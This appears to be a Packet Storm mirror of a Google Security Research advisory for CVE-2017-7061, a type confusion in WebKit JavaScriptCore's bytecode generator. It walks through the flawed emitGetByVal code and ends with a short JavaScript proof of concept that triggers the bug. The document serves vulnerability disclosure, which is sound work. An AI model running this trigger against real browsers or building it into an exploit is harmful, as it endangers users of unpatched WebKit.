Lucene search

K
packetstormGoogle Security ResearchPACKETSTORM:144092
HistorySep 12, 2017 - 12:00 a.m.

WebKit JSC BytecodeGenerator::emitGetByVal Incorrect Optimization

2017-09-1200:00:00
Google Security Research
packetstormsecurity.com
46
type confusion
op_get_direct_pname
cve-2017-7061
webkit
js code
bytecodegenerator
xss attack

EPSS

0.052

Percentile

93.1%

` WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal   
  
CVE-2017-7061  
  
  
Let's start with JS code.  
  
let o = {};  
for (let i in {xx: 0}) {  
o[i]; <<-------- (a)  
}  
  
When the code generator meets (a), it will call BytecodeGenerator::emitGetByVal.  
  
Here's the code of BytecodeGenerator::emitGetByVal.  
  
RegisterID* BytecodeGenerator::emitGetByVal(RegisterID* dst, RegisterID* base, RegisterID* property)  
{  
for (size_t i = m_forInContextStack.size(); i > 0; i--) {  
ForInContext& context = m_forInContextStack[i - 1].get();  
if (context.local() != property)  
continue;  
  
if (!context.isValid())  
break;  
  
if (context.type() == ForInContext::IndexedForInContextType) {  
property = static_cast<IndexedForInContext&>(context).index();  
break;  
}  
  
ASSERT(context.type() == ForInContext::StructureForInContextType);  
StructureForInContext& structureContext = static_cast<StructureForInContext&>(context);  
UnlinkedValueProfile profile = emitProfiledOpcode(op_get_direct_pname);  
instructions().append(kill(dst));  
instructions().append(base->index());  
instructions().append(property->index());  
instructions().append(structureContext.index()->index());  
instructions().append(structureContext.enumerator()->index());  
instructions().append(profile);  
return dst;  
}  
  
UnlinkedArrayProfile arrayProfile = newArrayProfile();  
UnlinkedValueProfile profile = emitProfiledOpcode(op_get_by_val);  
instructions().append(kill(dst));  
instructions().append(base->index());  
instructions().append(property->index());  
instructions().append(arrayProfile);  
instructions().append(profile);  
return dst;  
}  
  
The method uses op_get_by_val to handle expressions like "o[i]". But, there is a fast path, which uses op_get_direct_pname, for when the index variable is a string. op_get_direct_pname is designed for a string index only. So if other types are used as indexes, it will cause type confusions. In the above JS code, it's very clear that "i" will be a string("xx") semantically. Therefore, it will use op_get_direct_pname to handle it.  
  
Here's another example.  
  
let o = {};  
for (let i in {xx: 0}) {  
o[i]; <<-------- (a)  
i = 0x123456; <<-------- (b)  
o[i]; <<-------- (c)  
}  
  
In this case, it will use op_get_direct_pname at (a). And at (b), since the index variable "i" is replaced, the invalidate method of the ForInContext object that makes "context.isValid()" return false is called. So, op_get_by_val will be used at (c).  
  
But the problem is that it can't properly handle the following case which cause a type confusion.  
  
let o = {};  
for (let i in {xx: 0}) {  
for (let j = 0; j < 2; j++) {  
o[i]; // When j == 1, op_get_direct_pname was already emitted, but i is not a string anymore.  
i = 0;  
}  
}  
  
PoC:  
let o = {};  
for (let i in {xx: 0}) {  
for (let j = 0; j < 2; j++) {  
o[i];  
i = new Uint32Array([0, 1, 0x777777, 0, 0]);  
}  
}  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`